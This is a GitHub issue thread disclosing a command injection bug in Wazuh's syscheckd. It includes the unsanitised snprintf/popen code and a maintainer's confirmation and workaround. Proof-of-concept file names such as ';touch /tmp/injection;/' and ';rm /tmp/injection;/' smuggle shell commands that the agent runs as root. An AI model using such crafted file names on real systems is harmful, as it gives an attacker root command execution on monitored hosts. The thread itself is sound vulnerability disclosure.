### ISSUE TITLE
Command injection bug in syscheckd

### ISSUE THREAD

**Issue by rk700** [wazuh/wazuh#10717]
|Wazuh version|Component|Install type|Install method|Platform|
|---|---|---|---|---|
| 4.2.4 | syscheckd | Agent | Packages | CentOS 7 |

Hi,

We found a command injection bug in syscheckd when `prefilter_cmd` is set. The bug is in the file `src/os_crypto/md5_sha1_sha256/md5_sha1_sha256_op.c` where the filename is appended to the prefilter command without any sanitization.

```c
int res = snprintf(cmd, sizeof(cmd), "%s %s", prefilter_cmd, fname);
if (res < 0 || (unsigned int)res != target_length) {
    return (-1);
}
fp = popen(cmd, "r");
```

PoC as follows, where we set `/var/www/html` to be monitored:

```
www-data@hids_client:/var/www/html$ mkdir -p ';touch /tmp/injection;/'
www-data@hids_client:/var/www/html$ echo 123 > ';touch /tmp/injection;/1.html'
www-data@hids_client:/var/www/html$ ls -l /tmp/injection
-rw-r--r--. 1 root ossec 0 Nov  3 17:58 /tmp/injection
```

**Comment by antoniomanuelfr** [comment]
Hello @rk700 

I have reproduced this behavior successfully in my environment using the following configuration:
```xml
 <syscheck>
    <disabled>no</disabled>

    <!-- Frequency that syscheck is executed default every 12 hours -->
    <frequency>43200</frequency>
    <!-- Directories to check  (perform all possible verifications) -->
    <directories realtime="yes">/home/vagrant/tmp</directories>
    <prefilter_cmd>/usr/sbin/prelink -y</prefilter_cmd>
 <syscheck>
```
And these are the proofs of this behavior
```
root@ubuntumanager:/home/vagrant/tmp# mkdir -p ';touch /tmp/injection;/'
root@ubuntumanager:/home/vagrant/tmp# mkdir -p ';rm /tmp/injection;/'
root@ubuntumanager:/home/vagrant/tmp# ls -l /tmp/ | grep injection
root@ubuntumanager:/home/vagrant/tmp# echo 123 > ';touch /tmp/injection;/1.html'
root@ubuntumanager:/home/vagrant/tmp# ls -l /tmp/ | grep injection
-rw-r--r-- 1 root          ossec            0 Nov  3 12:38 injection
root@ubuntumanager:/home/vagrant/tmp# echo 123 > ';rm /tmp/injection;/1.html'
root@ubuntumanager:/home/vagrant/tmp# ls -l /tmp/ | grep injection
```

Thank you so much for reporting this. This is a serious vulnerability and we are going to fix it as soon as we can. 

In the meantime, the only workaround that is possible is to add the option `allow_remote_prefilter_cmd=no` in the shared configuration in order to avoid this behavior in the agent machines. You can find more information in this [link](https://documentation.wazuh.com/current/user-manual/reference/ossec-conf/syscheck.html?highlight=prefilter#prefilter-cmd).
